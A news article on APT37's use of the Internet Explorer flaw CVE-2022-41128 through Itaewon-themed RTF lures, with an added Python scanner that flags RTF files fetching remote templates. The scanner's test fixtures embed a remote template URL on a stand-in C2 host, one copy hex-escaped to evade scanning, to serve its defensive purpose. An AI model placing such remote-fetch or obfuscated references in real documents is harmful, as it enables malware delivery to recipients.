Security: these hackers exploited a critical flaw in Internet Explorer to deploy malware


Google cybersecurity analysts have spotted a zero-day flaw exploited by the North Korean hacker group APT37. The group allegedly used it to spy on and steal information from targets in South Korea.


According to the Google Threat Analysis Group (TAG), the Google division responsible for finding security vulnerabilities in information systems, the APT37 hackers took advantage of a zero-day vulnerability in Internet Explorer to plant malware through Office documents and target South Korean victims. The group, also known as Reaper or ScarCruft, is regarded as Pyongyang’s armed wing in the cyberwar between the North Korean government and its South Korean neighbor.


Google discovered that APT37 sends its targets infected documents carrying malicious scripts. According to the company’s blog, these hackers are known to prey on North Korean defectors, policy makers, journalists and other South Korean activists. Google’s cybersecurity experts were alerted by several users that a Microsoft Office document was circulating widely in the Land of the Morning Calm. The document refers to the Itaewon incident, which led to the death of several hundred people on October 29 in Seoul.

A flaw in Internet Explorer allowed malware to be downloaded even if you weren’t using Microsoft’s browser

This tragedy inevitably aroused the curiosity of South Koreans, who could not resist opening the file when it arrived in their inbox. From October 31, 2022, targeted users received files in RTF format. Once on the victim’s computer, these documents fetched their content in HTML form from remote servers, and that content opened automatically in Internet Explorer with no action required from the user. The hackers then exploited a flaw in the IE JavaScript engine that allowed malicious code to be executed from the site to which they had directed their targets.
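The delivery stage described above (an RTF document that pulls HTML content from a remote server) is something defenders can screen incoming attachments for. The following Python script is an added example, not code from the article or from Google TAG; it assumes the remote content is referenced through RTF’s `{\*\template ...}` destination (the usual remote-template mechanism, an assumption here since the article does not name the control word) and uses constructed sample documents, not the real files.

```python
import re

# Constructed RTF samples for demonstration (not the real documents
# described in the article). The hostname is a reserved .invalid domain.
BENIGN_RTF = rb"{\rtf1\ansi{\fonttbl{\f0 Times New Roman;}}\f0 Hello, world.\par}"
REMOTE_TEMPLATE_RTF = (
    rb"{\rtf1\ansi{\*\template http://c2.example.invalid/page.html}"
    rb"{\fonttbl{\f0 Arial;}}\f0 Report on the incident.\par}"
)
# Same reference with the scheme written as RTF hex escapes (\'hh), a
# common way to hide strings from naive keyword scanners.
OBFUSCATED_RTF = (
    rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://c2.example.invalid/page.html}"
    rb"\par}"
)

HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template\s+([^}]*)\}", re.IGNORECASE)
URL = re.compile(rb"(?:https?|file)://[^\s{}\\]+", re.IGNORECASE)


def normalize(rtf: bytes) -> bytes:
    """Resolve \\'hh hex escapes so obfuscated strings become searchable."""
    return HEX_ESCAPE.sub(lambda m: bytes.fromhex(m.group(1).decode()), rtf)


def scan_rtf(rtf: bytes) -> dict:
    """Flag RTF documents whose template destination points at a remote URL."""
    data = normalize(rtf)
    templates = [t.strip() for t in TEMPLATE_GROUP.findall(data)]
    remote_templates = [t for t in templates if URL.match(t)]
    return {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "remote_templates": [t.decode(errors="replace") for t in remote_templates],
        "urls": sorted({u.decode(errors="replace") for u in URL.findall(data)}),
        "suspicious": bool(remote_templates),
    }


if __name__ == "__main__":
    samples = [("benign", BENIGN_RTF), ("remote", REMOTE_TEMPLATE_RTF),
               ("obfuscated", OBFUSCATED_RTF)]
    for name, sample in samples:
        print(name, scan_rtf(sample))
```

A hit on `suspicious` only means the document reaches out to a remote server when opened; it says nothing about what the server returns, so treat it as a triage signal rather than a verdict.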

Fortunately, this vulnerability, CVE-2022-41128, was patched about ten days after it was discovered. The fix shipped, along with five other security fixes, in the November 2022 Patch Tuesday updates.

Source: Bleeping Computer
